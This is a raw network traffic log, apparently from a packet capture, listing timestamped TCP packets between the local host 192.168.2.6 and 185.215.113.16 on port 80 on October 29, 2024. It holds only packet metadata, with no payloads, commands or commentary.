Oct 29, 2024 06:59:24.092170954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.092186928 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.092302084 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.092339993 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.092361927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.092385054 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.092401981 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.092413902 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.092421055 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.092447996 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.093206882 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.093236923 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.093260050 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.093276024 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.093297005 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.093297958 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.093324900 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.094031096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.094047070 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.094063044 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.094083071 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.094105959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.094110012 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.094122887 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.094162941 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.094952106 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.097541094 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.097556114 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.097573042 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.097620010 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.097652912 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.248630047 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.248647928 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.248662949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.248742104 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.248769045 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.248785019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.248799086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.248811007 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.248816013 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.248831987 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.248843908 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.248864889 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.249072075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249130011 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249151945 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249167919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249172926 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.249185085 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249200106 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249207020 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.249218941 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249234915 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.249627113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249672890 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.249703884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249757051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249772072 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249788046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249790907 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.249803066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.249831915 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.250175953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250191927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250205994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250221014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250236034 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.250236034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250253916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250260115 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.250272989 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250278950 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.250289917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250338078 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.250740051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250760078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250797987 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250808954 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.250813007 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250823021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250837088 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250853062 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250860929 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.250879049 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.250884056 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250895977 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.250900030 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250916958 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.250958920 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.251652956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.251669884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.251693010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.251703978 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.251729012 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.251759052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.251775026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.251790047 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.251816034 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.254235029 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.254251003 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.254266977 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.254298925 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.254338026 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.555907965 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.555972099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.555986881 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556001902 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556019068 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556032896 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556034088 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556044102 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556049109 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556063890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556070089 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556087971 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556113958 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556116104 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556130886 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556145906 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556150913 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556160927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556175947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556189060 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556190014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556207895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556216955 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556222916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556252003 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556258917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556273937 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556288004 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556297064 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556302071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556318998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556328058 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556333065 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556349039 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556353092 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556363106 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556377888 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556391954 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556396961 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556418896 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556634903 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556651115 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556664944 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556679010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556679964 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556695938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556703091 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556711912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556727886 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556741953 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556742907 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556761026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556768894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556786060 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556802034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556811094 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556816101 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556832075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556849003 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556857109 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556865931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556883097 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556885004 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556899071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556905985 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556915045 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556938887 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556945086 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556955099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556969881 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.556982040 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.556986094 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.557003021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.557005882 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.557019949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.557034969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.557049036 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.557049990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.557065964 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.557073116 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.557082891 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.557115078 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.557202101 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.557261944 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.561958075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.561984062 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562011957 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562016010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562032938 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562048912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562052965 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562093973 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562123060 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562146902 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562163115 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562177896 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562195063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562202930 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562211037 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562227011 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562248945 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562252045 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562264919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562282085 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562295914 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562304974 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562314034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562330961 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562407017 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562444925 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562495947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562517881 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562535048 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562551022 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562556982 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562576056 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562592030 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562606096 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562608004 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562630892 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562635899 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562647104 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562661886 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562684059 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562686920 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562705994 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562712908 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562724113 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562738895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562748909 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.562757015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.562774897 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563111067 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563127041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563150883 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563163996 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563164949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563186884 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563232899 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563247919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563262939 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563271999 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563278913 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563297033 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563297033 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563323021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563339949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563342094 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563395023 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563402891 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563419104 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563435078 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563450098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563457012 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563467026 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563482046 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563497066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563508987 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563519001 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563523054 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563541889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563558102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563560963 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563572884 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563587904 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563602924 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563608885 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563628912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.563632965 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.563673973 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564043045 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564059019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564074039 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564095020 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564099073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564114094 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564130068 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564137936 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564146042 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564172983 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564239979 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564260960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564276934 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564284086 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564295053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564308882 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564310074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564333916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564347982 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564353943 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564363956 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564378977 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564389944 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564394951 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564414978 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564418077 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564435005 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564456940 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564827919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564842939 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564861059 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.564867020 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564904928 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.564979076 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.565002918 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.565017939 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.565041065 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.609504938 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.644584894 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644601107 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644624949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644639969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644659996 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644682884 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.644686937 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644706011 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644714117 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.644723892 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644733906 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.644741058 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644758940 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644764900 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.644776106 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644793987 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644804955 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.644809008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644826889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644835949 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.644872904 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.644915104 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644939899 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644957066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.644982100 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:24.645032883 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.645049095 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.645064116 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:24.645081997 CET	80	49769	185.215.113.16	192.168.2.6
